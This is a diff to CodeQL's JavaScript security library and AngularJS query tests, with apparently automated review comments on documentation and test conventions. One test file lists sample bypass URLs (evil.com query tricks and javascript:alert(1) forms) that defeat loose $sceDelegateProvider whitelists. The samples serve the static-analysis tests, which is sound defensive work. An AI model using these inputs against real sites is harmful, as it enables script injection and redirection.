diff --git a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll index 218f2f8366e5..9d106251a211 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll @@ -221,7 +221,10 @@ private module Postgres { /** Gets a value that is plugged into a raw placeholder variable, making it a sink for SQL injection. */ private DataFlow::Node getARawValue() { - result = this.getValues() and this.getARawParameterName() = "1" // Special case: if the argument is not an array or object, it's just plugged into $1 + result = this.getValues() and + this.getARawParameterName() = "1" and // Special case: if the argument is not an array or object, it's just plugged into $1 + not result instanceof DataFlow::ArrayCreationNode and + not result instanceof DataFlow::ObjectLiteralNode or exists(DataFlow::SourceNode values | values = this.getValues().getALocalSource() | result = values.getAPropertyWrite(this.getARawParameterName()).getRhs() diff --git a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll index 0a262d154b2b..90dcc886ed43 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll 
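Review bot: The new exclusion in `getARawValue` is purely syntactic: `not result instanceof DataFlow::ArrayCreationNode` only matches when the array or object literal is written directly as the values argument. If the literal is first stored in a local variable, `this.getValues()` is presumably a variable read, so the `$1` special case would still report the whole container as a raw value. Consider testing the local source instead, e.g. `not result.getALocalSource() instanceof DataFlow::ArrayCreationNode and not result.getALocalSource() instanceof DataFlow::ObjectLiteralNode`, or extend the inline comment to say that only direct literals are excluded. The predicate body continues past the end of this hunk.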
@@ -421,3 +421,22 @@ private module ClosureLibraryUri { } } } + +private class QueryStringStringification extends DataFlow::SummarizedCallable { + QueryStringStringification() { this = "query-string stringification" } + + override DataFlow::InvokeNode getACall() { + result = + API::moduleImport(["querystring", "query-string", "querystringify", "qs"]) + .getMember("stringify") + .getACall() or + result = API::moduleImport("url-parse").getMember("qs").getMember("stringify").getACall() or + result = API::moduleImport("parseqs").getMember("encode").getACall() + } + + override predicate propagatesFlow(string input, string output, boolean preservesValue) { + preservesValue = false and + input = ["Argument[0]", "Argument[0].AnyMemberDeep"] and + output = "ReturnValue" + } +} diff --git a/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll b/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll index e889480b48b7..e6c3345b2c7e 100644 --- a/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll +++ b/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll @@ -20,7 +20,11 @@ module ServerSideUrlRedirectConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { sink instanceof Sink } - predicate isBarrier(DataFlow::Node node) { node instanceof Sanitizer } + predicate isBarrier(DataFlow::Node node) { + node instanceof Sanitizer + or + node = HostnameSanitizerGuard::getABarrierNode() + } predicate isBarrierOut(DataFlow::Node node) { hostnameSanitizingPrefixEdge(node, _) } 
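Review bot: `QueryStringStringification` has no QLDoc, and the fact that it is a taint-only summary (`preservesValue = false`) deserves a sentence. I would add something like `/** A taint summary for query-string stringifiers: taint in the argument, or in any nested member of it, reaches the returned string. */` above the class. These functions normally percent-encode the values they emit, so the comment could also note that the result is treated as tainted regardless of that encoding. Queries whose sinks are neutralised by URL encoding would then need their own barrier.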
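Review bot: `isBarrier` in `ServerSideUrlRedirectConfig` now draws barriers from two independent sources, but nothing says why the second is needed. `HostnameSanitizerGuard` is defined outside this hunk, so a reader cannot tell from here which checks it accepts. A short QLDoc such as `/** Holds for explicit sanitizers and for values guarded by a hostname check. */` would help. The change note describes this as a regression fix, so an inline-expectation test with a redirect guarded by a hostname check would pin the behaviour, unless one is already added elsewhere in this commit.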
@@ -69,10 +73,12 @@ deprecated class Configuration extends TaintTracking::Configuration { } /** + * DEPRECATED. This is no longer used as a sanitizer guard. + * * A call to a function called `isLocalUrl` or similar, which is * considered to sanitize a variable for purposes of URL redirection. */ -class LocalUrlSanitizingGuard extends DataFlow::CallNode { +deprecated class LocalUrlSanitizingGuard extends DataFlow::CallNode { LocalUrlSanitizingGuard() { this.getCalleeName().regexpMatch("(?i)(is_?)?local_?url") } /** DEPRECATED. Use `blocksExpr` instead. */ diff --git a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll index 9e92f70af69f..42eb94230ae6 100644 --- a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll +++ b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll @@ -4,14 +4,22 @@ private import codeql.util.test.InlineExpectationsTest module Impl implements InlineExpectationsTestSig { private import javascript - final private class LineCommentFinal = LineComment; + final class ExpectationComment = ExpectationCommentImpl; - class ExpectationComment extends LineCommentFinal { - string getContents() { result = this.getText() } + class Location = JS::Location; + + abstract private class ExpectationCommentImpl extends Locatable { + abstract string getContents(); /** Gets this element's location. */ Location getLocation() { result = super.getLocation() } } - class Location = JS::Location; + private class JSComment extends ExpectationCommentImpl instanceof Comment { + override string getContents() { result = super.getText() } + } + + private class HtmlComment extends ExpectationCommentImpl instanceof HTML::CommentNode { + override string getContents() { result = super.getText() } + } } 
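Review bot: The QLDoc on `LocalUrlSanitizingGuard` now contradicts itself: the added line says the class is no longer used as a sanitizer guard, while the retained sentence still says such calls are "considered to sanitize a variable". The deprecation note also names no replacement. I would rewrite it along the lines of `DEPRECATED. Calls to isLocalUrl-style functions are no longer treated as sanitizer guards by this query.` and state what, if anything, users should rely on instead. If these calls previously suppressed alerts, the change note should say that code guarded only by such a call may now be reported; that cannot be confirmed from this hunk, and the class body continues outside it.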
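Review bot: `JSComment` and `HtmlComment` are undocumented, and `JSComment` widens the set of expectation comments from `LineComment` to every `Comment`. That presumably brings block and documentation comments into scope, so an existing test file with a `$` marker inside such a comment would start being interpreted as an expectation. A one-line QLDoc on each class, e.g. `/** A JavaScript comment of any kind, treated as a potential expectation comment. */`, would make the widening explicit.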
diff --git a/javascript/ql/src/change-notes/2025-02-21-test-suite.md b/javascript/ql/src/change-notes/2025-02-21-test-suite.md
new file mode 100644
index 000000000000..2fe2a2884964
--- /dev/null
+++ b/javascript/ql/src/change-notes/2025-02-21-test-suite.md
@@ -0,0 +1,5 @@
+---
+category: fix
+---
+* Fixed a recently-introduced bug that caused `js/server-side-unvalidated-url-redirection` to ignore
+ valid hostname checks and report spurious alerts after such a check. The original behaviour has been restored.
diff --git a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref
index a29deed369ec..9d7d0764c034 100644
--- a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref
+++ b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref
@@ -1 +1,2 @@
-AngularJS/DeadAngularJSEventListener.ql
\ No newline at end of file
+query: AngularJS/DeadAngularJSEventListener.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js
index d8616c9e2399..58b700a4c3f2 100644
--- a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js
+++ b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js
@@ -1,50 +1,50 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on('destroy', cleanup); // BAD + $scope.$on('destroy', cleanup); // $ Alert }) .controller('MyController', ["$scope", function(s) { - s.$on('destroy', cleanup); // BAD + s.$on('destroy', cleanup); // $ Alert }]) .controller('MyController', function($scope) { var destroy = 'destroy'; - $scope.$on(destroy, cleanup); // BAD + $scope.$on(destroy, cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$destroy', cleanup); // GOOD + $scope.$on('$destroy', cleanup); }) .controller('MyController', function($scope) { $scope.$emit('foo'); - $scope.$on('foo', cleanup); // GOOD + $scope.$on('foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('bar', cleanup); // BAD + $scope.$on('bar', cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$locationChangeStart', cleanup); // OK + $scope.$on('$locationChangeStart', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib1.foo', cleanup); // OK + $scope.$on('lib1.foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib2:foo', cleanup); // OK + $scope.$on('lib2:foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('onClick', cleanup); // OK + $scope.$on('onClick', cleanup); }) .controller('MyController', function($scope) { function f($scope){ $scope.$emit('probablyFromUserCode1') } - $scope.$on('probablyFromUserCode1', cleanup); // OK + $scope.$on('probablyFromUserCode1', cleanup); }) .controller('MyController', function($scope) { function f($scope){ var scope = $scope; scope.$emit('probablyFromUserCode2') } - $scope.$on('probablyFromUserCode2', cleanup); // OK + $scope.$on('probablyFromUserCode2', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('event-from-AngularJS-expression', cleanup); // GOOD + $scope.$on('event-from-AngularJS-expression', 
cleanup); }) ; diff --git a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref index f7a0044a73f8..7089aacb60e6 100644 --- a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref +++ b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref @@ -1 +1,2 @@ -AngularJS/DependencyMismatch.ql \ No newline at end of file +query: AngularJS/DependencyMismatch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js index c60a937b4c45..3afff0e3a50b 100644 --- a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js 
@@ -1,36 +1,36 @@ angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // NOT OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // $ Alert angular.module('app2') - .directive('mydirective', [ '$compile', function($compile, $http) { // NOT OK + .directive('mydirective', [ '$compile', function($compile, $http) { // $ Alert // ... }]); angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); // OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); angular.module('app2') - .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // OK + .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // ... }]); angular.module('app3', []) - .run(function(dep1, dep3) {}); // OK + .run(function(dep1, dep3) {}); angular.module('app4') - .directive('mydirective', function($compile, $http) { // OK + .directive('mydirective', function($compile, $http) { // ... }); angular.module('app5') - .directive('mydirective', [ 'fully.qualified.name', function(name) { // OK + .directive('mydirective', [ 'fully.qualified.name', function(name) { // ... }]) angular.module('app6') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js index 2ef8930246f9..312af00754e6 100644 --- a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js +++ b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js 
@@ -1,17 +1,17 @@ angular.module('app', []) .config(function($sceProvider) { - $sceProvider.enabled(false); // BAD + $sceProvider.enabled(false); // $ Alert }) .config(['otherProvider', function($sceProvider) { - $sceProvider.enabled(false); // OK + $sceProvider.enabled(false); }]) .config(['$sceProvider', function(x) { - x.enabled(false); // BAD + x.enabled(false); // $ Alert }]) .config(function($sceProvider) { - $sceProvider.enabled(true); // OK + $sceProvider.enabled(true); }) .config(function($sceProvider) { var x = false; - $sceProvider.enabled(x); // BAD + $sceProvider.enabled(x); // $ Alert }); diff --git a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref index 7a74c3338a31..0e0c8bd12433 100644 --- a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref +++ b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref @@ -1 +1,2 @@ -AngularJS/DisablingSce.ql \ No newline at end of file +query: AngularJS/DisablingSce.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref index 05ed8405fa82..b1ad3523f06f 100644 --- a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref +++ b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref @@ -1 +1,2 @@ -AngularJS/DoubleCompilation.ql +query: AngularJS/DoubleCompilation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js index f46e74bc7e97..c1248255132b 100644 --- a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js +++ b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js 
@@ -11,7 +11,7 @@ angular.module('app').directive('addMouseover', function($compile) { attrs.$set('addMouseover', null); // To stop infinite compile loop element.append(newEl); - $compile(element)(scope); // Double compilation + $compile(element)(scope); // $ Alert - Double compilation } } }) diff --git a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref index 24c81938cc3e..0a670daee6df 100644 --- a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref +++ b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref @@ -1 +1,2 @@ -AngularJS/IncompatibleService.ql \ No newline at end of file +query: AngularJS/IncompatibleService.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js index 51dbd1f76d48..c3855f207c04 100644 --- a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js +++ b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js 
@@ -11,68 +11,68 @@ angular.module('myModule', []) ; angular.module('myModule2', []) - .controller('c0', function(factoryId){}) // OK - .controller('c1', function(serviceId){}) // OK - .controller('c2', function(valueId){}) // OK - .controller('c3', function(constantId){}) // OK - .controller('c4', function(providerId){}) // OK - .controller('c5', function($http){}) // OK - .controller('c6', function($provider){}) // NOT OK - .controller('c7', function($scope){}) // OK - .controller('c8', function($compile){}) // OK - .controller('c9', function(UNKNOWN){}) // OK - .controller('c10', function(providerIdProvider){}) // NOT OK - .controller('c11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .controller('c12', function($provide){}) // OK (special case) - .controller('c13', function(providerId2Provider){}) // NOT OK + .controller('c0', function(factoryId){}) + .controller('c1', function(serviceId){}) + .controller('c2', function(valueId){}) + .controller('c3', function(constantId){}) + .controller('c4', function(providerId){}) + .controller('c5', function($http){}) + .controller('c6', function($provider){}) // $ Alert + .controller('c7', function($scope){}) + .controller('c8', function($compile){}) + .controller('c9', function(UNKNOWN){}) + .controller('c10', function(providerIdProvider){}) // $ Alert + .controller('c11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .controller('c12', function($provide){}) // OK - special case + .controller('c13', function(providerId2Provider){}) // $ Alert - .factory('s0', function(factoryId){}) // OK - .factory('s1', function(serviceId){}) // OK - .factory('s2', function(valueId){}) // OK - .factory('s3', function(constantId){}) // OK - .factory('s4', function(providerId){}) // OK - .factory('s5', function($http){}) // OK - .factory('s6', function($provider){}) // NOT OK - .factory('s7', function($scope){}) // NOT OK - .factory('s8', function($compile){}) // OK - 
.factory('s9', function(UNKNOWN){}) // OK - .factory('s10', function(providerIdProvider){}) // NOT OK - .factory('s11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .factory('s12', function($provide){}) // OK (special case) - .factory('s13', function(providerId2Provider){}) // NOT OK + .factory('s0', function(factoryId){}) + .factory('s1', function(serviceId){}) + .factory('s2', function(valueId){}) + .factory('s3', function(constantId){}) + .factory('s4', function(providerId){}) + .factory('s5', function($http){}) + .factory('s6', function($provider){}) // $ Alert + .factory('s7', function($scope){}) // $ Alert + .factory('s8', function($compile){}) + .factory('s9', function(UNKNOWN){}) + .factory('s10', function(providerIdProvider){}) // $ Alert + .factory('s11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .factory('s12', function($provide){}) // OK - special case + .factory('s13', function(providerId2Provider){}) // $ Alert - .run(function(factoryId){}) // OK - .run(function(serviceId){}) // OK - .run(function(valueId){}) // OK - .run(function(constantId){}) // OK - .run(function(providerId){}) // OK - .run(function($http){}) // OK - .run(function($provider){}) // NOT OK - .run(function($scope){}) // NOT OK - .run(function($compile){}) // OK - .run(function(UNKNOWN){}) // OK - .run(function(providerIdProvider){}) // NOT OK - .run(function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .run(function($provide){}) // OK (special case) - .run(function(providerId2Provider){}) // NOT OK + .run(function(factoryId){}) + .run(function(serviceId){}) + .run(function(valueId){}) + .run(function(constantId){}) + .run(function(providerId){}) + .run(function($http){}) + .run(function($provider){}) // $ Alert + .run(function($scope){}) // $ Alert + .run(function($compile){}) + .run(function(UNKNOWN){}) + .run(function(providerIdProvider){}) // $ Alert + .run(function(providerIdProvider, UNKNOWN){}) // $ 
Alert - but only one error + .run(function($provide){}) // OK - special case + .run(function(providerId2Provider){}) // $ Alert - .config(function(factoryId){}) // NOT OK - .config(function(serviceId){}) // NOT OK - .config(function(valueId){}) // NOT OK - .config(function(constantId){}) // OK - .config(function(providerId){}) // NOT OK - .config(function($http){}) // NOT OK - .config(function($provider){}) // OK - .config(function($scope){}) // NOT OK - .config(function($compile){}) // OK - .config(function(UNKNOWN){}) // OK - .config(function(providerIdProvider){}) // OK - .config(function(providerId, UNKNOWN){}) // NOT OK, but only one error - .config(function($provide){}) // OK (special case) - .config(function(valueId2){}) // NOT OK + .config(function(factoryId){}) // $ Alert + .config(function(serviceId){}) // $ Alert + .config(function(valueId){}) // $ Alert + .config(function(constantId){}) + .config(function(providerId){}) // $ Alert + .config(function($http){}) // $ Alert + .config(function($provider){}) + .config(function($scope){}) // $ Alert + .config(function($compile){}) + .config(function(UNKNOWN){}) + .config(function(providerIdProvider){}) + .config(function(providerId, UNKNOWN){}) // $ Alert - but only one error + .config(function($provide){}) // OK - special case + .config(function(valueId2){}) // $ Alert // service: same restrcitions as .factory - .service('s14', function(factoryId){}) // OK - .service('s15', function($provider){}) // NOT OK + .service('s14', function(factoryId){}) + .service('s15', function($provider){}) // $ Alert ; diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref index 26714392ac84..7c18e955f64c 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref 
+++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref
@@ -1 +1,2 @@
-AngularJS/InsecureUrlWhitelist.ql
\ No newline at end of file
+query: AngularJS/InsecureUrlWhitelist.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js
index 713e36e52233..1ee742c6d6a2 100644
--- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js
+++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js
@@ -1,24 +1,24 @@ angular.module('myApp', []) .config(function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ - "**://example.com/*", // BAD (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) - "*://example.org/*", // BAD (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) - "https://**.example.com/*", // BAD (exploit: https://evil.com/?ignore=://example.com/a) - "https://example.**", // BAD (exploit: https://example.evil.com or http://example.:foo@evil.com) - "https://example.*", // BAD (exploit: https://example.UnexpectedTLD) + "**://example.com/*", // $ RelatedLocation - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) + "*://example.org/*", // $ RelatedLocation - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) + "https://**.example.com/*", // $ RelatedLocation - exploit: https://evil.com/?ignore=://example.com/a + "https://example.**", // $ RelatedLocation - exploit: https://example.evil.com or http://example.:foo@evil.com + "https://example.*", // $ RelatedLocation - exploit: https://example.UnexpectedTLD - "https://example.com", // OK - "https://example.com/**", // OK - "https://example.com/*", // OK - "https://example.com/foo/*", // OK - "https://example.com/foo/**", // OK - "https://example.com/foo/*/bar", // OK - "https://example.com/foo/**/bar", // OK - "https://example.com/?**", // OK - "https://example.com/?**://example.com", // OK + "https://example.com", + "https://example.com/**", + "https://example.com/*", + "https://example.com/foo/*", + "https://example.com/foo/**", + "https://example.com/foo/*/bar", + "https://example.com/foo/**/bar", + "https://example.com/?**", + "https://example.com/?**://example.com", "https://*.example.com", // not flagged: - /http:\/\/www.example.org/g // BAD (exploit http://wwwaexample.org (dots are not 
escaped)) - ]); + /http:\/\/www.example.org/g // $ MISSING: RelatedLocation - (exploit http://wwwaexample.org (dots are not escaped)) + ]); // $ Alert }); diff --git a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref index 67c8ca36e697..5de5a3bd1b11 100644 --- a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref +++ b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref @@ -1 +1,2 @@ -AngularJS/MissingExplicitInjection.ql \ No newline at end of file +query: AngularJS/MissingExplicitInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js index 65d3e74ceef0..629b62d5b08e 100644 --- a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js 
@@ -1,27 +1,27 @@ (function(){ - function injected1(name){} // NOT OK + function injected1(name){} // $ Alert angular.module('app1').controller('controller1', injected1); - function injected2(name){} // OK + function injected2(name){} injected2.$inject = ['name']; angular.module('app2').controller('controller2', injected2); - function injected3(name){} // OK + function injected3(name){} angular.module('app3').controller('controller3', ['name', injected3]); - angular.module('app4').controller('controller4', function(){}); // OK + angular.module('app4').controller('controller4', function(){}); - angular.module('app5').controller('controller5', function(name){}); // NOT OK + angular.module('app5').controller('controller5', function(name){}); // $ Alert - function injected6(){} // OK + function injected6(){} angular.module('app6').controller('controller6', injected6); - function notInjected7(name){} // OK + function notInjected7(name){} var obj7 = { controller: notInjected7 }; - function injected8(name){} // OK (false negative: we do not track through properties) + function injected8(name){} // OK - false negative: we do not track through properties var obj8 = { controller: injected8 }; @@ -29,14 +29,14 @@ var $injector = angular.injector(); - function injected9(name){} // NOT OK + function injected9(name){} // $ Alert $injector.invoke(injected9) - function injected10(name){} // OK + function injected10(name){} injected10.$inject = ['name']; $injector.invoke(injected10) - function injected11(name){} // OK + function injected11(name){} $injector.invoke(['name', injected11]) })(); diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected index 227dcedf486c..ceb747011ba8 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected 
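Review bot: The `injected8` line in the first hunk keeps its known false negative as free text (`// OK - false negative: we do not track through properties`), which the inline-expectations postprocessing will presumably not check. The InsecureUrlWhitelist test in this same commit records its known miss as `// $ MISSING: RelatedLocation`. Using `// $ MISSING: Alert - we do not track through properties` here would be consistent, and would make the test fail visibly once property tracking is added.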
+++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected @@ -2,5 +2,5 @@ | repeated-injection.js:6:5:6:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:8:54:8:73 | ['name', $Injected2] | dependency injections | | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:11:5:11:22 | $Injected3.$inject | dependency injections | | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:12:5:12:22 | $Injected3.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref index 0cb3bca6dd4c..fdd21bbbde39 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref 
@@ -1 +1,2 @@
-AngularJS/RepeatedInjection.ql
\ No newline at end of file
+query: AngularJS/RepeatedInjection.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js
index 942a9ab1239e..9987e60d0ea5 100644
--- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js
+++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js
@@ -1,36 +1,36 @@ (function(){ - function $Injected1(name){} // OK + function $Injected1(name){} $Injected1.$inject = ['name']; angular.module('app1').controller('controller1', $Injected1); - function $Injected2(name){} // NOT OK + function $Injected2(name){} // $ Alert $Injected2.$inject = ['name']; angular.module('app2').controller('controller2', ['name', $Injected2]); - function $Injected3(name){} // NOT OK + function $Injected3(name){} // $ Alert $Injected3.$inject = ['name']; $Injected3.$inject = ['name']; angular.module('app3').controller('controller3', $Injected3); - function not$Injected4(name){} // OK + function not$Injected4(name){} angular.module('app4').controller('controller4', not$Injected4); - function not$Injected5(name){} // OK + function not$Injected5(name){} angular.module('app5').controller('controller5', ['name', not$Injected5]); - function $Injected6(name){} // OK (because it never becomes registered) + function $Injected6(name){} // OK - because it never becomes registered $Injected6.$inject = ['name']; $Injected6.$inject = ['name']; - function not$Injected7(name){} // OK + function not$Injected7(name){} angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', not$Injected7); - angular.module('app8').controller('controller8', function inline8(name){}); // OK + angular.module('app8').controller('controller8', function inline8(name){}); - angular.module('app9').controller('controller9', ['name', function inline9(name){}]); // OK + angular.module('app9').controller('controller9', ['name', function inline9(name){}]); - function $Injected10(name){ // NOT OK (alert formatting for multi-line function) + function $Injected10(name){ // $ Alert - alert formatting for multi-line function } $Injected10.$inject = ['name']; angular.module('app10').controller('controller10', ['name', $Injected10]); 
